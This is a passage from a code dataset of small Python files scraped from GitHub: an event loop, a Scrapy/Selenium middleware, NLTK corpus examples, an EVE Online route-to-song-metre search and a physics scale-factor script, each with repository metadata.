run(self):\n while True:\n events = self.selector.select()\n for key, mask in events:\n socket = key.data\n if mask | selectors.EVENT_READ:\n socket.on_read()\n elif mask | selectors.EVENT_WRITE:\n socket.on_write()\n\n if self.is_done():\n break\n\n","repo_name":"Swind/concurrency_example","sub_path":"libs/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2182734559","text":"from src.clustering import Clustering\nfrom src.dataloader import DataLoader\nfrom src.dimension_reduction import DimRed\nfrom src.standardizer import Standardizer\n\n\ndef main():\n dl = DataLoader()\n standardizer = 
Standardizer(dl=dl, concept=\"final_death_rate\")\n standardizer.run()\n dimred = DimRed(stand=standardizer, dim_red=\"2D2PCA\")\n dimred.run()\n clustering = Clustering(dimred=dimred, img_prefix=\"2d2pca_fdr_man_\", threshold=15, dist=\"manhattan\")\n clustering.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vmarsi/COVID-19-Country-Clustering","sub_path":"src/main_run.py","file_name":"main_run.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32828546104","text":"import random\nimport selenium.webdriver.support.ui as ui\n\nfrom scrapy.http import HtmlResponse\nfrom scrapy import signals\nfrom selenium import webdriver\n\n# Use a downloader middleware together with selenium\nclass JavaScriptMiddleware(object):\n def process_request(self, request, spider):\n if spider.name == \"music\":\n driver = webdriver.Chrome('G:/Tools/selenium/chromedriver.exe') # specify the browser to use\n driver.get(request.url)\n driver.switch_to.frame('g_iframe') # switch into the iframe\n wait = ui.WebDriverWait(driver, 15)\n if wait.until(lambda driver: driver.find_element_by_id('toplist')):\n body = driver.page_source\n return HtmlResponse(driver.current_url, body=body, encoding='utf-8', request=request)\n else:\n return","repo_name":"jenifly/scrapy_t1","sub_path":"jenifly_scrapy/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37251368592","text":"# Using a while or for loop, compute and print the Fibonacci numbers.\n\nfibonacciCount = int(input())\n\nprevFibonacci = 0\ncurrentFibonacci = 1\ncount = 0\n\n# check if the number of terms is valid\nif fibonacciCount <= 0:\n print(\"Must be positive integer\")\nelif fibonacciCount == 1:\n print(\"Fibonacci sequence:\")\n print(prevFibonacci)\nelse:\n print(\"Fibonacci sequence:\")\n while count < fibonacciCount:\n print(prevFibonacci)\n calculated = prevFibonacci + currentFibonacci\n\n prevFibonacci = currentFibonacci\n currentFibonacci = calculated\n count += 1\n","repo_name":"valentin-mladenov/Tu-Varna","sub_path":"Machine.Learning/lab_1/z1_fibonachi.py","file_name":"z1_fibonachi.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30386997101","text":"# -*- coding: utf-8 -*-\n\nimport nltk\nfrom pprint import pprint\n# Gutenberg corpus\nfrom nltk.corpus import gutenberg\n# Web text corpus\nfrom nltk.corpus import webtext\n# Read text content\nfrom nltk.corpus import PlaintextCorpusReader\n# Inaugural address corpus\nfrom nltk.corpus import inaugural\n# Instant-message chat session corpus\nfrom nltk.corpus import nps_chat\n# Brown corpus, containing 500 different sources\nfrom nltk.corpus import brown\n# Reuters corpus\nfrom nltk.corpus import reuters\n\n\ndef corpus():\n # Get all text files in the corpus\n l = gutenberg.fileids()\n print(l)\n\n # Get the list of all words in a text\n w = gutenberg.words(\"austen-emma.txt\")\n print(w)\n\n # Load a corpus from plain-text files\n names_corpus = PlaintextCorpusReader('../testdata', ['female.txt', 'male.txt'])\n all_names = names_corpus.words()\n print(all_names)\n\n # Return the raw text string\n # raw_str = gutenberg.raw(\"austen-emma.txt\")\n # print(raw_str)\n\n # Return the text's sentence list; each sentence is a list of words\n sentences = gutenberg.sents(\"austen-emma.txt\")\n print(sentences)\n\n # Get the web text corpus\n net_corpus = webtext.fileids()\n print(net_corpus, type(net_corpus))\n\n # US presidential inaugural address corpus\n sp = inaugural.fileids()\n print(sp[-10:])\n print(type(sp))\n print(sp[-6:-1])\n\n # Chat session corpus\n tt = nps_chat.fileids()\n pprint(tt)\n\n # 
Return the list of posts; each post is a list of words; Oct 19, 2005, 30s age group, 705 posts\n chat_room = nps_chat.posts('10-19-30s_705posts.xml')\n print(chat_room[-3:])\n\n # Get all categories in the corpus\n cc = brown.categories()\n print(cc)\n c = brown.fileids(['news', 'lore'])\n print(c)\n print(brown.words('ca01'))\n\n # Categories of the Reuters corpus\n rr = reuters.categories()\n print(rr)\n print(len(rr))\n\n# Conditional frequency: category as condition, word as event\npairs = [(genre, word) for genre in brown.categories() for word in brown.words(categories=genre)]\nprint(pairs[:4])\ncfd = nltk.ConditionalFreqDist(pairs)\nprint(cfd.conditions())\n\ngenres = ['news', 'religion', 'hobbies', 'science_fiction', 'romance', 'humor']\nmodals = ['can', 'could', 'may', 'might', 'must', 'him']\n# Display as a table\ncfd.tabulate(conditions=genres, samples=modals)\n# Plot\n# cfd.plot(conditions=genres, samples=modals)\n\ntext = brown.words(categories='news')\n# Bigrams\nbigrams_words = nltk.bigrams(text)\n# print(list(bigrams_words)[:4])\ncfd = nltk.ConditionalFreqDist(bigrams_words)\n# print(cfd.conditions())\nfd = cfd['can']\n# Analyze the words that follow 'can'\nfd.plot(10)","repo_name":"clnFind/NLPLearning","sub_path":"nltk/nltk_test.py","file_name":"nltk_test.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19604624281","text":"import csv # for importing csv files\nimport networkx as nx # for graphing and plotting\nimport matplotlib.pyplot as plt\nimport time\nimport sys\n\n## Import random number stuff\nimport os\nclear = lambda: os.system('clear')\nimport struct\nimport random\n\n## Debugging\n# import pdb; pdb.set_trace()\n\n# Initialize random number generator\nsystemRandom = random.SystemRandom()\n\n# Define Static global variables\n\n## Location of metre CSV file.\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/mother_pollyanna.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/warp_to_the_dance_floor.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/providence_skies.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/dumb_ways_to_die.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/chocobo.csv\"\nMETRE_CSV_FILE_LOCATION = \"DATA/metre/scratch_metre.csv\"\n\n## Location of graph CSV file.\nGRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations.csv\"\n#GRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations_namedregions.csv\"\n#GRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations_theforge.csv\"\n#GRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations_kimotoro.csv\"\n\n## Initial node settings\n### Name of first node (must be in graph).\nINITIAL_NODE = \"Djimame\"\n### Number of syllables of first node (must be in graph)\nINITIAL_NODE_SYLLABLES = 3\n### Initial score to start with.\nFIRST_JUMP_SCORE = float(1.00)\n\n## Route search settings\n### Max number of jump attempts (~)\nMAX_JUMPS = 1000000\n### How much to penalize encountering recently visited nodes.\nSHORTLOOP_PENALTY_FACTOR = float(0.30)\n### Defines how long in the past is \"recent\"\nSHORTLOOP_LENGTH = 4\n### How much to penalize having to backtrack while searching.\nBACKTRACK_PENALTY_FACTOR = float(0.90)\n### How much to penalize failing a jump forward to a candidate node.\nNO_JUMP_PENALTY_FACTOR = float(0.90)\n### How much to reward selecting a successful jump forward.\nNEW_JUMP_BONUS = float(1.05)\n### How much to reward selecting a node with many syllables.\nLONGNAME_BONUS_FACTOR = float(1.05)\n### Route score below which backtracking is required.\nBACKTRACK_THRESHOLD = float(0.10)\n### Initial score to assign latest entry in route score 
list.\nNEW_JUMP_SCORE = float(1.00)\n\n\n# Create graph with CSV file info\n#with open('DATA/system_connections_pronunciations.csv', 'r') as csvfile:\n#with open('DATA/system_connections_pronunciations_namedregions.csv', 'r') as csvfile:\n#with open('DATA/system_connections_pronunciations_theforge.csv', 'r') as csvfile:\nwith open(GRAPH_CSV_FILE_LOCATION, 'r') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n\n # Initialize sublists\n solar_system_name = []\n security_rating = []\n region = []\n constellation = []\n coord_x = []\n coord_z = []\n coord_y = []\n gate_1 = []\n gate_2 = []\n gate_3 = []\n gate_4 = []\n gate_5 = []\n gate_6 = []\n gate_7 = []\n gate_8 = []\n pron_1_sc = []\n pron_1 = []\n pron_2_sc = []\n pron_2 = []\n pron_3_sc = []\n pron_3 = []\n\n # Populate sublists\n for row in readCSV:\n solar_system_name_sub = row[0]\n security_rating_sub = row[1]\n region_sub = row[2]\n constellation_sub = row[3]\n coord_x_sub = row[4]\n coord_z_sub = row[5]\n coord_y_sub = row[6]\n gate_1_sub = row[7]\n gate_2_sub = row[8]\n gate_3_sub = row[9]\n gate_4_sub = row[10]\n gate_5_sub = row[11]\n gate_6_sub = row[12]\n gate_7_sub = row[13]\n gate_8_sub = row[14]\n pron_1_sc_sub = row[15]\n pron_1_sub = row[16]\n pron_2_sc_sub = row[17]\n pron_2_sub = row[18]\n pron_3_sc_sub = row[19]\n pron_3_sub = row[20]\n \n solar_system_name.append(solar_system_name_sub)\n security_rating.append(security_rating_sub)\n region.append(region_sub)\n constellation.append(constellation_sub)\n coord_x.append(coord_x_sub)\n coord_z.append(coord_z_sub)\n coord_y.append(coord_y_sub)\n gate_1.append(gate_1_sub)\n gate_2.append(gate_2_sub)\n gate_3.append(gate_3_sub)\n gate_4.append(gate_4_sub)\n gate_5.append(gate_5_sub)\n gate_6.append(gate_6_sub)\n gate_7.append(gate_7_sub)\n gate_8.append(gate_8_sub)\n pron_1_sc.append(pron_1_sc_sub)\n pron_1.append(pron_1_sub)\n pron_2_sc.append(pron_2_sc_sub)\n pron_2.append(pron_2_sub)\n pron_3_sc.append(pron_3_sc_sub)\n pron_3.append(pron_3_sub)\n\n solar_system_name.pop(0)\n security_rating.pop(0)\n region.pop(0)\n constellation.pop(0)\n coord_x.pop(0)\n coord_z.pop(0)\n coord_y.pop(0)\n gate_1.pop(0)\n gate_2.pop(0)\n gate_3.pop(0)\n gate_4.pop(0)\n gate_5.pop(0)\n gate_6.pop(0)\n gate_7.pop(0)\n gate_8.pop(0)\n pron_1_sc.pop(0)\n pron_1.pop(0)\n pron_2_sc.pop(0)\n pron_2.pop(0)\n pron_3_sc.pop(0)\n pron_3.pop(0)\n\n #convert list of string integers into list of strings\n #pron_1_sc = list(map(int, pron_1_sc))\n #pron_2_sc = list(map(int, pron_2_sc))\n #pron_3_sc = list(map(int, pron_3_sc))\n\n #convert list of string floats into list of floats\n #coord_x = list(map(float, coord_x))\n #coord_z = list(map(float, coord_z))\n #coord_y = list(map(float, coord_y))\n \n# Test print data in lists\n# print(solar_system_name)\n# print(security_rating)\n# print(region)\n# print(constellation)\n# print(coord_x)\n# print(coord_z)\n# print(coord_y)\n# print(gate_1)\n# print(gate_2)\n# print(gate_3)\n# print(gate_4)\n# print(gate_5)\n# print(gate_6)\n# print(gate_7)\n# print(gate_8)\n# print(pron_1_sc)\n# print(pron_1)\n# print(pron_2_sc)\n# print(pron_2)\n# print(pron_3_sc)\n# print(pron_3)\n\n# Create graph\nG=nx.Graph()\n\n\n# Add nodes\nG.add_nodes_from(solar_system_name)\n\n\n# Add edges\ncount = 0\nfor origin in solar_system_name:\n #print(count)\n if gate_1[count]:\n #print('Found element')\n #print(*[origin,gate_1[count]])\n G.add_edge(*[origin,gate_1[count]])\n #else:\n #print('Empty element')\n if gate_2[count]:\n #print('Found element')\n 
#print(*[origin,gate_2[count]])\n G.add_edge(*[origin,gate_2[count]])\n #else:\n #print('Empty element')\n if gate_3[count]:\n #print('Found element')\n #print(*[origin,gate_3[count]])\n G.add_edge(*[origin,gate_3[count]])\n #else:\n #print('Empty element')\n if gate_4[count]:\n #print('Found element')\n #print(*[origin,gate_4[count]]) \n G.add_edge(*[origin,gate_4[count]])\n #else:\n #print('Empty element')\n if gate_5[count]:\n #print('Found element')\n #print(*[origin,gate_5[count]])\n G.add_edge(*[origin,gate_5[count]])\n #else:\n #print('Empty element')\n if gate_6[count]:\n #print('Found element')\n #print(*[origin,gate_6[count]])\n G.add_edge(*[origin,gate_6[count]])\n #else:\n #print('Empty element')\n if gate_7[count]:\n #print('Found element')\n #print(*[origin,gate_7[count]])\n G.add_edge(*[origin,gate_7[count]])\n #else:\n #print('Empty element')\n if gate_8[count]:\n #print('Found element')\n #print(*[origin,gate_8[count]])\n G.add_edge(*[origin,gate_8[count]])\n #else:\n #print('Empty element')\n count += 1\n\n# List edges of graph\n#print(G.edges())\n\n# Draw (don't activate if plotting all of New Eden)\n#nx.draw(G, with_labels = True)\n#plt.show()\n\n#print(G.nodes())\n#print(G.edges())\n#print(list(G.adj['Jita']))\n\n\n# Import meter list from CSV file.\nwith open(METRE_CSV_FILE_LOCATION, 'r') as csvfile2:\n readMetreCSV = csv.reader(csvfile2, delimiter=',')\n metre_master = []\n for row in readMetreCSV:\n metre_master_sub = row[0]\n metre_master.append(metre_master_sub)\n metre_master.pop(0)\n metre_master = list(map(int, metre_master))\n metre = metre_master.copy() # Make working duplicate of metre_master\nprint('Master metre is:',metre_master)\n\n\n# Initialize route lists:\nscore = []\nscore.append(float(FIRST_JUMP_SCORE)) # initialize and set initial score\nroute = []\nroute.append(INITIAL_NODE) # initialize and set initial node\nroute_syllables = [INITIAL_NODE_SYLLABLES] # initialize route syllables list\nmetre[0] = metre[0] - INITIAL_NODE_SYLLABLES\nmetre_master_progress_index = 0 # initialize master metre list index\n#print(route)\n\n\n# Primary search loop\nfor jump in range (0, MAX_JUMPS):\n\n # Status calcs.\n adjacent_systems = list(G.adj[route[-1]])\n current_system = route[-1]\n current_system_index = solar_system_name.index(current_system)\n current_score = score[-1]\n remaining_metre = metre[0]\n adjacent_system_count = len(adjacent_systems)\n \n # Status report.\n #clear()\n print(\":: :: :: ::\")\n print(\"metre_master :\",metre_master)\n print(\"We are on jump :\",jump)\n print(\"Route list so far :\",route)\n print(\"metre list status :\",metre)\n print(\"score list status :\",[\"{0:0.15f}\".format(i) for i in score])\n print(\"syllable_list status:\",route_syllables)\n print(\"Current system: :\",current_system)\n print(\"Current sys index :\",current_system_index)\n print(\"Current score is :\",current_score)\n print(\"remaining_metre :\",remaining_metre)\n print(\"Adjacent systems :\",adjacent_systems)\n print(\"Adj. system count :\",adjacent_system_count)\n\n if remaining_metre == 0: # Check if next jump fully consumed remaining_metre\n print('remaining_metre = 0. 
Loading next metre element.')\n metre.pop(0) # Removes first element in metre list so next element will be loaded next loop.\n print('====METRE ELEMENT POPPED====')\n # Detect metre depletion.\n if not metre:\n print(\"========METRE DEPLETED========\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\"Master metre list :\", metre_master)\n print(\"Completed syllable list :\",route_syllables)\n print(\"Completed route list :\", route)\n print(\"Completed score list :\", [\"{0:0.3f}\".format(i) for i in score])\n print(\"Completed route jump count:\",len(route))\n print(\"Final metre list status:\", metre)\n print(\"Jump evaluation loops initiated:\",jump)\n print(\"Final lyrics:\")\n print([str(route[i])+' - '+str(route_syllables[i]) for i in range (len(route))])\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\"Total systems in route:\",len(route))\n print(\":: :: :: :: :: :: :: :: ::\")\n sys.exit()\n else:\n remaining_metre = metre[0] # Load new first entry into remaining_metre variable.\n print('remaining_metre :',remaining_metre)\n metre_master_progress_index += 1 # Update current corresponding position in metre_master\n print('metre_master_progress_index updated to:',metre_master_progress_index)\n print('metre list status :',metre)\n\n \n # Select random system for next jump.\n nextRandJumpInvalid = True\n while nextRandJumpInvalid:\n #Select random system from adjacent_systems list\n nextRandJumpAdjacentIndex = systemRandom.randint(0,adjacent_system_count - 1)\n print(\"Next random jump Index:\",nextRandJumpAdjacentIndex)\n nextRandJumpName = adjacent_systems[nextRandJumpAdjacentIndex]\n print(\"Next random jump Name :\",nextRandJumpName)\n # Calculate index within solar_system_name that contains nextRandJumpName\n nextRandJumpSolarSystemIndex = solar_system_name.index(nextRandJumpName)\n if nextRandJumpName in solar_system_name and pron_1_sc[nextRandJumpSolarSystemIndex].isdigit():\n nextRandJumpInvalid = False\n print('Next jump is within loaded solar systems list. Exiting while loop.')\n else:\n nextRandJumpInvalid = True\n print('Next jump is not within loaded solar systems list. 
Remaining in while loop to reroll.')\n \n # Identify syllable count for next jump\n #print('solar_system_name list:',solar_system_name)\n #print('pron_1_sc',pron_1_sc)\n #print('current_system_index:',nextRandJumpSolarSystemIndex)\n #print('int(pron_1_sc[nextRandJumpSolarSystemIndex]):',int(pron_1_sc[nextRandJumpSolarSystemIndex]))\n nextRandJumpSyllableCount = int(pron_1_sc[nextRandJumpSolarSystemIndex])\n print(\"Next random jump name syllable count:\",nextRandJumpSyllableCount)\n\n # Apply score penalties\n #Penalty if next jump system is already in last SHORTLOOP_LENGTH entries of route\n if nextRandJumpName in route[-int(SHORTLOOP_LENGTH):]:\n score[-1] = score[-1] * SHORTLOOP_PENALTY_FACTOR\n #Penalty if next jump system is already in last 2*SHORTLOOP_LENGTH entries of route\n if nextRandJumpName in route[-int(2 * SHORTLOOP_LENGTH):]:\n score[-1] = score[-1] * SHORTLOOP_PENALTY_FACTOR\n #Penalty for each occurence of a system within the SHORTLOOP_LENGTH\n if nextRandJumpName in route[-int(SHORTLOOP_LENGTH):]:\n nameOccurencesInShortLoop = route.count(nextRandJumpName)\n score[-1] = score[-1] * SHORTLOOP_PENALTY_FACTOR**(nameOccurencesInShortLoop/2)/2\n\n # Apply score bonuses\n #Apply bonus scaled to how many syllables name has\n score[-1] = score[-1] * LONGNAME_BONUS_FACTOR**(nextRandJumpSyllableCount - 1)\n \n # Subtract syllables from remaining metre\n remaining_metre = remaining_metre - nextRandJumpSyllableCount\n print(\"Updated remaining metre:\",remaining_metre)\n\n # If next jump syllable count does NOT cause remaining_metre to go\n # negative, then perform jump (update metre, route, score, and\n # route_syllable lists)\n # If next jump syllable count does cause remaining_metre to go\n # negative, then do NOT perform jump (do NOT update metre,\n # route, or route_syllable lists). Apply penalty to latest\n # element in score list.\n # Note: This will cause next loops to try different jumps until\n # the latest score list element falls below a threshhold.\n # If previous jump score is below BACKTRACK_THRESHOLD then backtrack:\n # 1. Increment remaining_metre by amount in latest\n # route_syllables list element, restoring metre list to\n # previous state\n # 2. Adding entry to front of metre list if remaining_metre\n # incremented above original metre element value (comparison\n # made against metre_master using\n # metre_master_progress_index as a reference.\n # 3. Remove latest entry in score list.\n # 4. Remove latest entry in score_syllables list.\n # 5. Remove latest entry in route list.\n # 6. Apply penalty to latest element in score list.\n if score[-1] < BACKTRACK_THRESHOLD: # Check if most recent score low enough to trigger backtracking.\n print('========SCORE VIOLATION========')\n print('Score violation occured. 
Backtracking.')\n        metre[0] = metre[0] + route_syllables[-1]\n        print('Backtracked new metre[0] value:',metre[0])\n        print('metre_master:',metre_master)\n        print('metre_master_progress_index:',metre_master_progress_index)\n        print('metre_master[metre_master_progress_index]:',metre_master[metre_master_progress_index])\n        # Handle case if backtrack rolls back over a meter boundary\n        if metre[0] > metre_master[metre_master_progress_index]:\n            # Save value to be stored in restored element to be shortly prepended to metre[]\n            backtrack_metre_carryover = metre[0] - metre_master[metre_master_progress_index]\n            # Restore first element in metre[] back to original value from metre_master\n            metre[0] = metre_master[metre_master_progress_index]\n            # Prepend carryover value to be new first element in metre[]\n            metre.insert(0,backtrack_metre_carryover)\n            # Decrement metre_master_progress_index by one.\n            metre_master_progress_index -= 1\n        score.pop() # Remove latest score list element.\n        route_syllables.pop() # Remove latest route_syllables list element.\n        route.pop() # Remove latest route list element.\n        if not score:\n            print('score list depleted. not applying penalty')\n            print('score list:',score)\n            print('route_syllable list:',route_syllables)\n            print('route list:',route)\n        else:\n            score[-1] = score[-1] * BACKTRACK_PENALTY_FACTOR #Applying penalty to previous score element.\n            print('BACKTRACK PENALTY applied to score. Score now:',score[-1])\n        # Handle case if route list completely emptied\n        if not route:\n            # Start again but from random system\n            # Select random system from solar_system_name\n#            import pdb; pdb.set_trace()\n            initialRandSystemIndexInvalid = True\n            while initialRandSystemIndexInvalid:\n                initialRandSystemIndex = systemRandom.randint(0,len(solar_system_name)-1)\n                initialRandSystemName = solar_system_name[initialRandSystemIndex]\n                if pron_1_sc[initialRandSystemIndex].isdigit():\n                    initialRandSystemIndexInvalid = False\n                    initialRandSystemSyllableCount = int(pron_1_sc[initialRandSystemIndex]) \n                else:\n                    initialRandSystemIndexInvalid = True\n            # Reinitialize:\n            # 1. route list\n            # 2. metre list\n            # 3. route_syllable list\n            # 4. score list\n            route = []\n            route.append(initialRandSystemName)\n            metre = metre_master.copy()\n            metre[0] = metre[0] - initialRandSystemSyllableCount\n            route_syllables = [initialRandSystemSyllableCount]\n            score = []\n            score.append(float(FIRST_JUMP_SCORE))\n            metre_master_progress_index = 0\n            print('====ROUTE LIST DEPLETED, RESTARTING SEARCH FROM RANDOM NODE====')\n            #time.sleep(.1)\n    else:\n        print('remaining_metre of prospective jump:',remaining_metre)\n        if remaining_metre >= 0: # Check if some syllables still remain\n            print('Some or no syllables remain. Updating last element of metre list.')\n            metre[0] = remaining_metre # Set updated remaining_metre to first entry of metre list.\n            score[-1] = score[-1] * NEW_JUMP_BONUS # Add bonus to node before jump\n            score.append(NEW_JUMP_SCORE) # Add new element to end of score list\n            route_syllables.append(nextRandJumpSyllableCount) # Add new element to end of route_syllable list\n            route.append(nextRandJumpName) # Add new element to route list containing next rand jump.\n            print('====JUMP SUCCESS : NEW JUMP BONUS APPLIED====')\n        else: # What to do if remaining_metre < 0\n            print('======METRE VIOLATION : NO JUMP PENALTY======')\n            print('Metre violation occurred. 
Jump cancelled.')\n print('No changes made to score, route, or route_syllables lists.')\n score[-1] = score[-1] * NO_JUMP_PENALTY_FACTOR # Applying penalty to previous score element.\n print('NO JUMP PENALTY applied to score. Score now:',score[-1])\n print(\":: :: :: ::\")\n print(\"\")\n print(\"\")\n\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint('====JUMPS DEPLETED, SEARCH FAILED====')\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\n\n \n \n \n","repo_name":"baltakatei/routesong","sub_path":"routesong.py","file_name":"routesong.py","file_ext":"py","file_size_in_byte":20310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5650921963","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 18 18:40:30 2019\n\n@author: Dell\n\"\"\"\nimport requests\na=int(input())\n\nb=int(input())\ntry:\n z = a/b\n print(z)\nexcept ZeroDivisionError:\n print(a)\nfinally:\n print(\"Write \")\nurl_my_404 ='www.ivgo180419.com'\nprint(requests.get(url_my_404))","repo_name":"goglevivan/AllLesson","sub_path":"trying.py","file_name":"trying.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18979296303","text":"import sys\nimport pickle\nimport array\nimport math\n\nimport ROOT\n\nphotonPtBins = array.array('d', [40., 50., 8000.])\nphotonEtaBins = array.array('d', [0., 0.8, 1.4442])\nelectronPtBins = array.array('d', [20., 30., 40., 50., 8000.])\nelectronEtaBins = array.array('d', [0., 0.8, 1.442, 1.556, 2., 2.5])\nmuonPtBins = array.array('d', [25., 30., 35., 40., 50., 60., 90., 140., 8000.])\nmuonEtaBins = array.array('d', [0., 0.9, 1.2, 2.1, 2.4])\n\nidSFOutputFile = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/scalefactors.root', 'recreate')\n\nphoton = ROOT.TH2D('photon', 'Photon ID scale factor', len(photonPtBins) - 1, photonPtBins, len(photonEtaBins) - 1, photonEtaBins)\nelectron = ROOT.TH2D('electron', 'Electron ID scale factor', len(electronPtBins) - 1, electronPtBins, len(electronEtaBins) - 1, electronEtaBins)\nmuon = ROOT.TH2D('muon', 'Muon ID scale factor', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\nmuonData = ROOT.TH2D('muonData', 'Muon ID efficiency data', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\nmuonMC = ROOT.TH2D('muonMC', 'Muon ID efficiency MC', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\n\nphotonIDBaseSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/Photon_ID_CSEV_SF_Jan22rereco_Full2012_S10_MC_V01.root')\nphotonIDBase = photonIDBaseSource.Get('PhotonIDSF_LooseWP_Jan22rereco_Full2012_S10_MC_V01')\nphotonIDVetoSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/photonID/scaleFactorZmumug_pt.root')\nphotonIDVeto = photonIDVetoSource.Get('scale_nochnogsf_all')\n\nfor iP in range(photonIDVeto.GetN()):\n iX = 
photon.GetXaxis().FindFixBin(photonIDVeto.GetX()[iP])\n if iX == 0: continue\n if iX > photon.GetNbinsX(): break\n\n for iY in range(1, photon.GetNbinsY() + 1):\n bin = photon.GetBin(iX, iY)\n\n photon.SetBinContent(bin, photonIDVeto.GetY()[iP])\n photon.SetBinError(bin, photonIDVeto.GetErrorY(iP))\n\nfor iX in range(1, photon.GetNbinsX() + 1):\n sX = photonIDBase.GetXaxis().FindFixBin(photon.GetXaxis().GetBinLowEdge(iX))\n \n for iY in range(1, photon.GetNbinsY() + 1):\n sY = photonIDBase.GetYaxis().FindFixBin(photon.GetYaxis().GetBinCenter(iY))\n \n bin = photon.GetBin(iX, iY)\n sbin = photonIDBase.GetBin(sX, sY)\n\n sf = photon.GetBinContent(bin) * photonIDBase.GetBinContent(sbin)\n relErrVeto = photon.GetBinError(bin) / photon.GetBinContent(bin)\n relErrBase = photonIDBase.GetBinError(sbin) / photonIDBase.GetBinContent(sbin)\n\n photon.SetBinContent(bin, sf)\n photon.SetBinError(bin, sf * math.sqrt(relErrVeto * relErrVeto + relErrBase * relErrBase))\n\n\nphotonIDBaseSource.Close()\nphotonIDVetoSource.Close()\n\n#[20., 30., 40., 50., 8000.] x [0., 0.8, 1.442, 1.556, 2., 2.5]\nelectronSFs = [\n [(0.986, 0.002), (1.002, 0.001), (1.005, 0.001), (1.004, 0.001)],\n [(0.959, 0.003), (0.980, 0.001), (0.988, 0.001), (0.988, 0.002)],\n [(0.967, 0.007), (0.950, 0.007), (0.958, 0.005), (0.966, 0.009)],\n [(0.941, 0.005), (0.967, 0.003), (0.992, 0.002), (1.000, 0.003)],\n [(1.020, 0.003), (1.021, 0.003), (1.019, 0.002), (1.022, 0.004)]\n]\nelectronSFSystematics = [\n [1.40, 0.28, 0.14, 0.41],\n [1.40, 0.28, 0.14, 0.41],\n [5.70, 2.40, 0.28, 0.43],\n [2.20, 0.59, 0.30, 0.53],\n [2.20, 0.59, 0.30, 0.53]\n]\n\nfor iEta in range(len(electronSFs)):\n row = electronSFs[iEta]\n for iPt in range(len(row)):\n bin = electron.GetBin(iPt + 1, iEta + 1)\n sf, err = row[iPt]\n syst = electronSFSystematics[iEta][iPt] * 0.01\n electron.SetBinContent(bin, sf)\n electron.SetBinError(bin, math.sqrt(err * err + syst * syst))\n\nwith open('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/MuonEfficiencies_Run2012ReReco_53X.pkl') as source:\n muonID = pickle.load(source)['Tight']\n\nwith open('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/MuonEfficiencies_ISO_Run_2012ReReco_53X.pkl') as source:\n muonISO = pickle.load(source)['combRelIsoPF04dBeta<012_Tight']\n\nfor iPt in range(len(muonPtBins) - 1):\n if muonPtBins[iPt] < 140.:\n ptbinName = str(int(muonPtBins[iPt])) + '_' + str(int(muonPtBins[iPt + 1]))\n else:\n ptbinName = '140_300'\n\n for iEta in range(len(muonEtaBins) - 1):\n if muonEtaBins[iEta] < 0.5:\n etabinName = 'ptabseta<0.9'\n else:\n etabinName = 'ptabseta%.1f-%.1f' % (muonEtaBins[iEta], muonEtaBins[iEta + 1])\n\n idset = tuple([muonID[etabinName][ptbinName]['data/mc'][k] for k in ['efficiency_ratio', 'err_low', 'err_hi']])\n isoset = tuple([muonISO[etabinName][ptbinName]['data/mc'][k] 